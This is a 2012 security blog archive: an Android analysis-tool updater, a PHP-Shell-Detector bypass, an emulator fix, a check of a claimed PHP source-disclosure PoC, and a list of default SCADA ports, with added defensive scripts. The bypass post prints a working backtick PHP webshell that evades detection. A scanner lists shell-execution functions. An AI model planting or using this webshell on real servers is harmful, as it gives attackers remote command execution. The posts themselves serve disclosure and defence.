AREsoft-updater Released

Posted: August 25th, 2012 | Filed under: IT Related | No Comments

Hi everyone and Eid Mubarak to my Muslim friends.

If you haven't heard about A.R.E. yet, it is basically the Android Reverse Engineering (A.R.E.) Virtual Machine, which combines the latest Android malware analysis tools in a readily accessible toolbox.

Tools currently found on A.R.E. are:

The A.R.E maintainer created a GitHub repo for easy installation and updates; however, the rapid development of each individual project above does not stay in sync with the updates of the A.R.E GitHub repo. This is why AREsoft-updater was created.

AREsoft-updater is an updater script for the Android Reverse Engineering software that belongs to the A.R.E VM from the Honeynet Project.

AREsoft-updater will check for the latest available version of each individual project/tool listed above and compare it with the local (installed) version in A.R.E. If a newer version is available, AREsoft-updater will automatically download and install the update for your A.R.E.

AREsoft-updater also supports the latest (recently released) DroidBox for Android 2.3 and APIMonitor.

AREsoft-updater requires curl to work. Kindly install curl in your A.R.E virtual machine.
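As an added example (not AREsoft-updater's own code, and not taken from any of the projects it updates), here is the check-compare-fetch loop the three paragraphs above describe, written from scratch in POSIX sh. It assumes a layout that is my own: each tool records its installed version in $ARE_HOME/<tool>/VERSION, and each project publishes a plain-text VERSION file plus a <tool>-<version>.tar.gz tarball under a base URL. The base URLs in the TOOLS table are placeholders, not the real project locations.

```shell
#!/bin/sh
# Added example, not AREsoft-updater's own code. Assumptions: installed
# version in $ARE_HOME/<tool>/VERSION; remote side publishes <base>/VERSION
# and <base>/<tool>-<ver>.tar.gz. URLs below are placeholders.

ARE_HOME="${ARE_HOME:-$HOME/are-tools}"

# version_gt A B -> exit 0 if dotted numeric version A is newer than B.
# Compares field by field so that 1.10 sorts after 1.9 (numeric fields only).
version_gt() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai="${a%%.*}"; bi="${b%%.*}"
        if [ "$a" = "$ai" ]; then a=""; else a="${a#*.}"; fi
        if [ "$b" = "$bi" ]; then b=""; else b="${b#*.}"; fi
        if [ "${ai:-0}" -gt "${bi:-0}" ]; then return 0; fi
        if [ "${ai:-0}" -lt "${bi:-0}" ]; then return 1; fi
    done
    return 1
}

# Installed version of a tool, or 0 if it has never been installed.
local_version() {
    if [ -f "$ARE_HOME/$1/VERSION" ]; then cat "$ARE_HOME/$1/VERSION"; else echo 0; fi
}

# Latest published version: curl (which AREsoft-updater also needs) fetches
# <base_url>/VERSION. Redefine this function to exercise the logic offline.
remote_version() {
    curl -fsSL "$1/VERSION"
}

# check_tool NAME BASE_URL -> prints "update <version>" or "up-to-date".
check_tool() {
    installed=$(local_version "$1")
    latest=$(remote_version "$2") || { echo "error"; return 1; }
    if version_gt "$latest" "$installed"; then echo "update $latest"; else echo "up-to-date"; fi
}

# Download and unpack NAME-VER.tar.gz into $ARE_HOME/NAME, then record VER.
# The version file is only written if the download and extraction succeeded.
install_tool() {
    name="$1"; base="$2"; ver="$3"
    mkdir -p "$ARE_HOME/$name"
    curl -fsSL "$base/$name-$ver.tar.gz" | tar -xzf - -C "$ARE_HOME/$name" \
        && printf '%s\n' "$ver" > "$ARE_HOME/$name/VERSION"
}

# Tool table (placeholder URLs). The main loop only runs when invoked as
# "sh updater.sh run", so the functions can be sourced and tested offline.
TOOLS='droidbox https://example.invalid/droidbox
apimonitor https://example.invalid/apimonitor'

if [ "${1:-}" = "run" ]; then
    printf '%s\n' "$TOOLS" | while read -r name base; do
        result=$(check_tool "$name" "$base")
        case "$result" in
            "update "*) ver="${result#update }"; echo "$name: updating to $ver"; install_tool "$name" "$base" "$ver" ;;
            up-to-date) echo "$name: up to date" ;;
            *)          echo "$name: could not check" ;;
        esac
    done
fi
```

Two design points: the comparison is done numerically per field rather than with plain string comparison, because "1.10" must be treated as newer than "1.9"; and because the script pulls and unpacks code from the network with curl, the base URLs should be HTTPS and, where a project publishes checksums or signatures, those should be verified before tar runs.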

AREsoft-updater is released under the WTFPL (Do What The Fuck You Want To Public License) on my GitHub: https://github.com/xanda/AREsoft-updater

 

Thanks


PHP-Shell-Detector Bypassed

Posted: August 10th, 2012 | Filed under: IT Related | 1 Comment

Hi and Ramadan Mubarak to my Muslim friends.

A few nights ago I saw a Twitter update from @pentestit on a project called PHP-Shell-Detector, a PHP script that helps you find and identify PHP/CGI (Perl)/ASP/ASPX shells.

My friends and I were a bit disappointed because we had developed the same thing but had not yet released it to the public, for no reason.

But speaking of PHP-Shell-Detector, new stuff still needs to be tested 🙂 so I put it to the test.

I tested it with a webshell I found in the wild. Impressive... PHP-Shell-Detector managed to detect it. The GUI and AJAX were nice as well.

I spent some time taking a look at the code and found that the "suspicious functions used" part was implemented using a regex, and I found that something is missing... So I created a simple webshell to test my theory. Here is my code:

<?php
$cmd = $_GET['cmd'];
echo `$cmd`;
?>

And let's see the result:

This is because the backtick is not in the regex, and I believe it is not in the signature part as well.

I reported this issue on the GitHub page and came up with a regex and tokenizer suggestion as the solution, but from the response I got, I don't think it will be implemented any time soon.
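To make the gap concrete, here is an added example (my own code, not PHP-Shell-Detector's, and OLD_PATTERN is a constructed stand-in for a function-name-only check, not the project's actual regex). It runs two grep patterns over constructed sample files: the function-name-only pattern misses the backtick variant from this post, while the pattern extended with the backtick operator flags it.

```shell
#!/bin/sh
# Added example, not PHP-Shell-Detector's code. OLD_PATTERN and
# FIXED_PATTERN are constructed for this demo, not the project's regex.

# Function-name-only pattern: known names followed by "(". The leading group
# avoids matching inside longer identifiers (e.g. "my_system(").
OLD_PATTERN='(^|[^[:alnum:]_])(system|exec|shell_exec|passthru|popen|proc_open|eval)[[:space:]]*\('

# Same list plus the backtick operator, which runs a shell command without
# naming any function at all, so a name list alone can never catch it.
FIXED_PATTERN="$OLD_PATTERN"'|`'

# scan_file PATTERN FILE -> prints "suspicious" or "clean".
scan_file() {
    if grep -Eq "$1" "$2"; then echo suspicious; else echo clean; fi
}

# Constructed samples written to a temp dir so the script runs stand-alone.
make_samples() {
    dir=$(mktemp -d)
    printf '%s\n' '<?php system($_GET["cmd"]); ?>' > "$dir/classic.php"
    printf '%s\n' '<?php $cmd = $_GET["cmd"]; echo `$cmd`; ?>' > "$dir/backtick.php"
    printf '%s\n' '<?php echo "hello"; ?>' > "$dir/benign.php"
    echo "$dir"
}

main() {
    dir=$(make_samples)
    for f in "$dir"/*.php; do
        printf '%-14s old: %-10s fixed: %s\n' "$(basename "$f")" \
            "$(scan_file "$OLD_PATTERN" "$f")" "$(scan_file "$FIXED_PATTERN" "$f")"
    done
    rm -rf "$dir"
}
main
```

Adding the backtick closes this particular hole, but any pattern over source text stays blind to variable functions, string concatenation and encoded payloads; that is why the tokenizer route suggested to the project (walking PHP's own token stream instead of the raw text) is the more robust direction.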

Anyway... Overall, PHP-Shell-Detector is a good project and would help webmasters simplify the process of "searching" for hidden planted shells on their website.

Thanks

[Update]

I received an email from the project maintainer saying that the regex has been updated. Awesome! 🙂


Android Emulator Error on Ubuntu 64bit

Posted: August 2nd, 2012 | Filed under: IT Related | No Comments

SDL init failure, reason is: No available video device

If you are getting the above error while launching the Android emulator on a 64-bit OS, this is what you need to do:

sudo apt-get update
sudo apt-get install ia32-libs

That's all... Now relaunch your emulator.

Thanks

Updated on 7th August 2012

Here is another tip for you on how to start Intel hardware-assisted virtualization (hypervisor) on Linux to speed up the Intel Android x86 Gingerbread emulator.


PHP 5.4.3 (cli) Code Read Vulnerability?

Posted: June 15th, 2012 | Filed under: IT Related | 2 Comments

As posted on http://1337day.com/exploits/18605, cheki claimed that PHP 5.4.3 is vulnerable to a code read vulnerability, where the PHP interpreter will fail to execute the file once a '~' symbol is added to the end of the file name. Snipped from the PoC:

=============================================================

#Demo: [root@cheki]# curl 109.234.119.2/index.php~

result: <?php phpinfo(); ?>

#Target: http://localhost/index.php~

result: <?php phpinfo(); ?>
============================================================

[root@cheki]# curl 109.234.119.2/index.php

result: NULL

#Target: http://localhost/index.php

result: NULL

===========================================================

Ok... Since I had a test machine (Ubuntu) SSHed into earlier, I straight away added a new PPA repo (https://launchpad.net/~ondrej/+archive/php5) and installed PHP 5.4.3. So here is my version, to verify the PoC:

xanda@vostro:~$ php -v
PHP 5.4.3-4~precise+1 (cli) (built: May 17 2012 13:00:25) 
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
 
 
xanda@vostro:~$ curl 127.0.0.1/index.php
<form action="" method="post">
<input type="text" name="lala">
<input type="submit">
</form>
 
 
xanda@vostro:~$ curl 127.0.0.1/index.php~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php~ was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>

Hurmmmm okkkk... I haven't tested it on Fedora release 17 (Beefy Miracle) as claimed by the author, but I think this is... You name it...

Please take note that most GUI-based text editors (e.g. Gedit) will (auto)save your edited file into a backup file with the same file name but ending with '~'... Just like in the PoC, huh?

If anyone manages to test it on Fedora release 17 (Beefy Miracle), kindly drop me the result in the comment section. Thanks in advance.

Cheers 🙂

Mirror for the advisory: http://pastebin.com/H1tjRDpD

 

Update

1) @Netasq has given 2 workarounds for this issue.

  • http://twitter.com/Netasq/status/213647398025703425
    In case you can't update PHP to 5.4.4, a quick Apache fix #security (1/2)  Order allow,deny Deny from all

2) It's not listed here (or have I missed it?): http://www.php.net/ChangeLog-5.php
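Whatever the interpreter does, the practical exposure described above is an editor's index.php~ backup sitting in the document root where the web server treats it as a plain file. As an added example (my own script, not taken from the post or from the @Netasq tweet), the following finds such backup and swap copies under a document root and emits an Apache 2.2-style directive in the spirit of that workaround. The suffix list, the FilesMatch pattern and the demo docroot are my assumptions, not the tweet's exact configuration.

```shell
#!/bin/sh
# Added example, not from the post or the @Netasq tweet. The suffix list and
# the FilesMatch pattern are my own choices for this demo.

# Print every file under DOCROOT that looks like an editor backup or swap copy
# (Gedit-style "name~", plus common .bak and Vim .swp names).
find_backup_files() {
    find "$1" -type f \( -name '*~' -o -name '*.bak' -o -name '*.swp' \) | sort
}

# Number of such files, as a checkable result.
count_backup_files() {
    find_backup_files "$1" | wc -l | tr -d ' '
}

# Apache 2.2-style block (the post's server is Apache 2.2.22) refusing to
# serve those names. On Apache 2.4 the two Order/Deny lines become
# "Require all denied".
apache_deny_snippet() {
    cat <<'EOF'
<FilesMatch "(~|\.bak|\.swp)$">
    Order allow,deny
    Deny from all
</FilesMatch>
EOF
}

# Constructed demo docroot: one live file, one "~" backup, one Vim swap file.
make_demo_docroot() {
    dir=$(mktemp -d)
    printf '%s\n' '<?php echo "live"; ?>' > "$dir/index.php"
    printf '%s\n' '<?php echo "old draft"; ?>' > "$dir/index.php~"
    printf '%s\n' 'swap' > "$dir/.index.php.swp"
    echo "$dir"
}

main() {
    root=$(make_demo_docroot)
    echo "Backup files exposed under $root:"
    find_backup_files "$root"
    echo
    echo "Suggested Apache directive:"
    apache_deny_snippet
    rm -rf "$root"
}
main
```

Run the find step against the real document root as a periodic check; the directive is a safety net for the files the check misses, and deleting the stray backups (or editing outside the docroot) removes the exposure at its source.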


Default SCADA Ports

Posted: June 14th, 2012 | Filed under: IT Related | No Comments

Just a re-mirror of http://pastebin.com/EwCibKgc

# Default Scada Ports
 
- xflix
 
+-------+---------------------------------------+
| Port  | Description                           |
+-------+---------------------------------------+
| 502   | Modbus                                |
| 1089  | Foundation Fieldbus HSE               |
| 1090  | Foundation Fieldbus HSE               |
| 1091  | Foundation Fieldbus HSE               |
| 1541  | Foxboro/Invensys Foxboro DCS Informix |
| 1883  | MQ Telemetry Transport                |
| 2222  | EtherNet/IP                           |
| 3480  | OPC UA Discovery Server               |
| 4000  | Emerson/Fisher ROC Plus               |
| 4592  | Project/SCADA Node Primary Port       |
| 5050  | Telvent OASyS DNA                     |
| 5052  | Telvent OASyS DNA                     |
| 5065  | Telvent OASyS DNA                     |
| 5450  | OSIsoft PI Server                     |
| 10307 | ABB Ranger 2003                       |
| 10311 | ABB Ranger 2003                       |
| 10364 | ABB Ranger 2003                       |
| 10407 | ABB Ranger 2003                       |
| 10409 | ABB Ranger 2003                       |
| 10412 | ABB Ranger 2003                       |
| 10414 | ABB Ranger 2003                       |
| 10428 | ABB Ranger 2003                       |
| 10431 | ABB Ranger 2003                       |
| 10447 | ABB Ranger 2003                       |
| 10449 | ABB Ranger 2003                       |
| 12316 | ABB Ranger 2003                       |
| 12645 | ABB Ranger 2003                       |
| 12647 | ABB Ranger 2003                       |
| 13722 | ABB Ranger 2003                       |
| 11001 | Johnson Controls Metasys N1           |
| 12135 | Telvent OASyS DNA                     |
| 13724 | ABB Ranger 2003                       |
| 13782 | ABB Ranger 2003                       |
| 14592 | SCADA Node Secondary Port             |
| 18000 | Iconic Genesis32 GenBroker (TCP)      |
| 19999 | DNP                                   |
| 20000 | DNP3                                  |
| 34962 | PROFINET                              |
| 34963 | PROFINET                              |
| 34964 | PROFINET                              |
| 34980 | EtherCAT                              |
| 38589 | ABB Ranger 2003                       |
| 38593 | ABB Ranger 2003                       |
| 38000 | SNC GENe                              |
| 38011 | SNC GENe                              |
| 38014 | SNC GENe                              |
| 38200 | SNC GENe                              |
| 38210 | SNC GENe                              |
| 38301 | SNC GENe                              |
| 38400 | SNC GENe                              |
| 38600 | ABB Ranger 2003                       |
| 38700 | SNC GENe                              |
| 38971 | ABB Ranger 2003                       |
| 39129 | ABB Ranger 2003                       |
| 39278 | ABB Ranger 2003                       |
| 44818 | EtherNet/IP                           |
| 45678 | Foxboro/Invensys Foxboro DCS AIMAPI   |
| 47808 | BACnet/IP                             |
| 50001 | Siemens Spectrum Power TG             |
| 50018 | Siemens Spectrum Power TG             |
| 50020 | Siemens Spectrum Power TG             |
| 50025 | Siemens Spectrum Power TG             |
| 50110 | Siemens Spectrum Power TG             |
| 55000 | FL-net Reception                      |
| 55003 | FL-net Transmission                   |
| 55550 | Foxboro/Invensys Foxboro DCS FoxAPI   |
| 56001 | Telvent OASyS DNA                     |
| 62900 | SNC GENe                              |
| 62911 | SNC GENe                              |
| 62924 | SNC GENe                              |
| 62930 | SNC GENe                              |
| 62938 | SNC GENe                              |
| 62956 | SNC GENe                              |
| 62963 | SNC GENe                              |
| 62981 | SNC GENe                              |
| 62985 | SNC GENe                              |
| 62992 | SNC GENe                              |
| 63012 | SNC GENe                              |
| 63027 | SNC GENe                              |
| 63041 | SNC GENe                              |
| 63075 | SNC GENe                              |
| 63079 | SNC GENe                              |
| 63082 | SNC GENe                              |
| 63088 | SNC GENe                              |
| 63094 | SNC GENe                              |
| 65443 | SNC GENe                              |
+-------+---------------------------------------+
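One defensive use of a list like this is as an alert list on the network boundary: any flow to one of these ports that does not originate from the control network is worth a look. As an added example (my own script, not part of the mirrored paste), the following awk filter applies a subset of the ports above to constructed firewall flow records. The record format, the sample flows and the "control network" prefix 10.10. are assumptions for this demo.

```shell
#!/bin/sh
# Added example, not part of the original paste. Flow record format,
# sample data and the control-network prefix are constructed for the demo.

# Subset of the ports from the table above (extend as needed).
ICS_PORTS="502 1883 2222 4000 20000 44818 47808"

# Source prefix treated as the legitimate control network (assumption;
# a crude string prefix, not a real CIDR match).
ICS_NET_PREFIX="10.10."

# Constructed sample flow records: <src_ip> <dst_ip> <dst_port> <proto>
SAMPLE_FLOWS='10.10.1.5 10.10.2.20 502 tcp
192.168.50.7 10.10.2.20 502 tcp
10.10.1.9 10.10.2.21 44818 tcp
172.16.4.3 10.10.2.30 20000 tcp
172.16.4.3 10.10.2.30 443 tcp'

# Read flow records from stdin; print every flow that hits an ICS port
# from a source outside the control network.
flag_ics_flows() {
    awk -v ports="$ICS_PORTS" -v prefix="$ICS_NET_PREFIX" '
        BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) ics[p[i]] = 1 }
        ($3 in ics) && index($1, prefix) != 1 {
            printf "ALERT %s -> %s:%s/%s\n", $1, $2, $3, $4
        }'
}

# Number of alerts for the embedded sample, as a checkable result.
sample_alert_count() {
    printf '%s\n' "$SAMPLE_FLOWS" | flag_ics_flows | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_FLOWS" | flag_ics_flows
```

On the sample, the two flows from 192.168.50.7 and 172.16.4.3 to Modbus (502) and DNP3 (20000) are flagged, while the same outside host reaching 443 is not; in practice the filter would read exported firewall or NetFlow records rather than an embedded string.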